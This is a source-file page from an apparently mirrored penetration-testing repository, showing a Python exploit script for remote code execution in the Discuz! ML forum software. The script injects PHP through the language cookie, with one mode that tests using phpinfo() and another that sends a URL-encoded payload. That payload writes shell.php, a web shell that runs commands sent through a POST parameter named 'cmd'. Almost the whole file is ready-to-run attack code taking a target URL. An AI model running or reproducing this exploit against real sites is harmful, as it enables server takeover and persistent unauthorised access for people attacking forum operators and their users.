admin/Penetration_Testing_POC
1
0
Fork 0
mirror of https://github.com/Mr-xn/Penetration_Testing_POC.git synced 2025-06-20 18:00:35 +00:00
Code Issues Packages Projects Releases Wiki Activity
Penetration_Testing_POC/tools/dz_ml_rce.py

71 lines
3.2 KiB
Python
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

#!/usr/bin/python
# coding=utf-8
import requests
import re
from argparse import ArgumentParser
class Dz_Ml_RCE:
def __init__(self):
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
'Cookie': 'qbn8_2132_saltkey=Gbu6t373; qbn8_2132_language={}; qbn8_2132_lastvisit=1595902511; qbn8_2132_sid=TemWvk; qbn8_2132_lastact=1595906207%09forum.php%09; qbn8_2132_sendmail=1; qbn8_2132_onlineusernum=1;PHPSESSID=8phdj361a5d498n03tnqd7c104;'
}
def check(self):
'''漏洞检测'''
self.headers['Cookie'] = self.headers['Cookie'].format("\'.phpinfo().\'")
r = requests.get(url=result.url, headers=self.headers)
if re.search(r'<title>phpinfo\(\)</title>', r.text):
print("[*]Target Is Seem To Be Vulnerable!")
else:
print("[!]Target Is Not Seem To Be Vulnerable!")
def getshell(self):
shell_payload = '%27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%32%32%25%36%33%25%36%64%25%36%34%25%32%32%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%27%29%29.%27'
self.headers['Cookie'] = self.headers['Cookie'].format(shell_payload)
r = requests.get(url=result.url, headers=self.headers)
if re.search(r'<title>Forum - Powered by Discuz!</title>', r.text):
print("[*]Shell Create Successfully")
print(f"[+]shell{result.url} 同目录下的shell.php 密码cmd")
else:
print("[!]Shell Create Failed")
def run(self):
if result.func == 'check':
self.check()
elif result.func == 'shell':
self.getshell()
else:
print("[!]请选择正确的功能check(漏洞检测)/shell(直接getshell)")
def main():
if not result.func:
print("[!]请先使用-f指定可选的功能check(漏洞检测)/getshell(直接getshell)")
return
else:
Dz_Ml_RCE().run()
if __name__ == '__main__':
show = '''
_____ _ __ __ _ _____ _____ ______
| __ \ | | | \/ | | | __ \ / ____| ____|
| | | |___| | | \ / | | | |__) | | | |__
| | | |_ / | | |\/| | | | _ /| | | __|
| |__| |/ /|_| | | | | |____ | | \ \| |____| |____
|_____//___(_) |_| |_|______| |_| \_\\_____|______|
______
|______|
By PANDA墨森
'''
print(show + '\n'*2)
arg = ArgumentParser(description='Dz_Ml_RCE By PANDA墨森')
arg.add_argument('url', help='目标urleaghttp://www.xxx.com/discuz/upload/forum.php')
arg.add_argument('-f', '--func', help='可选的功能check(漏洞检测)/shell(直接getshell)', dest='func', type=str)
result = arg.parse_args()
main()
Reference in New Issue View Git Blame Copy Permalink